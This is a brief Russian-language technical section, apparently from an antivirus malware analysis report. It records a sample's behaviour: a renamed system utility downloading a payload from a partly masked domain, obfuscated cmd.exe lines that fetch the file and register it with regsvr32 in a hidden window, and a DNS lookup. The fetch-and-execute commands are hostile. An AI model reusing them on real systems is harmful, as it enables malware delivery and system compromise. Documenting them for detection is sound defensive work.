Техническая информация
- '%PROGRAMDATA%\1.exe' /urlcache /f http://bo###axf6.com/bolb/jaent.php?l=######### %PROGRAMDATA%\1.tmp
- '<SYSTEM32>\cmd.exe' /c "set u=url&&call %PROGRAMDATA%\1.exe /%u%^c^a^c^h^e^ /f^ http://bo###axf6.com/bolb/jaent.php?l=######### %PROGRAMDATA%\1.tmp && call regsvr32 %PROGRAMDATA%\1.tmp"
- %PROGRAMDATA%\1.exe
- DNS ASK bo###axf6.com
- '<SYSTEM32>\cmd.exe' /c "set u=url&&call %PROGRAMDATA%\1.exe /%u%^c^a^c^h^e^ /f^ http://bo###axf6.com/bolb/jaent.php?l=######### %PROGRAMDATA%\1.tmp && call regsvr32 %PROGRAMDATA%\1.tmp"' (со скрытым окном)